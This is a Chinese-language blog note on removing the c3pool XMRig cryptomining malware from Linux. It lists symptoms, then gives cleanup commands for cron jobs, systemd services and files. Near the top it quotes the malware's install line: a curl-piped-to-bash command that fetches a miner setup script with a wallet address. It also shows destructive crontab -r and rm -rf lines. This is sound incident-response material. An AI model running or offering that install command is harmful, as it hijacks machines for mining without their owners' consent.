挖矿平台:猫池
病毒来源安装脚本
cat /root/c3pool/config.json
crontab -r
cd /root/c3pool
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33QxjJdzzcMA2bvwo6P4i6AxZjzsh227W3SjodscE45xFD7iXuW12
旷池提供的卸载脚本
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
中毒现象
高cpu和高内存占用
kill -9 杀掉之后自动重启
进程ip:47.76.163.177 为美国IP,IP查询
查杀过程
查找病毒脚本位置find / -name xmrig
检查是否有相关的定时任务
crontab -l
如果有定时任务则删除掉
find / -name cron* -type d
查找自启动服务
因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除
systemctl list-units --type=service
find / -name c3pool_miner.service
找到所有相关的服务,全部删除
# 关闭自启动
systemctl disable c3pool_miner.service
# 停止服务
systemctl stop c3pool_miner.service
# 删除服务
rm -f /etc/systemd/system/c3pool_miner.service
最后将脚本文件删除
rm -rf /root/c3pool/
【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒 kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册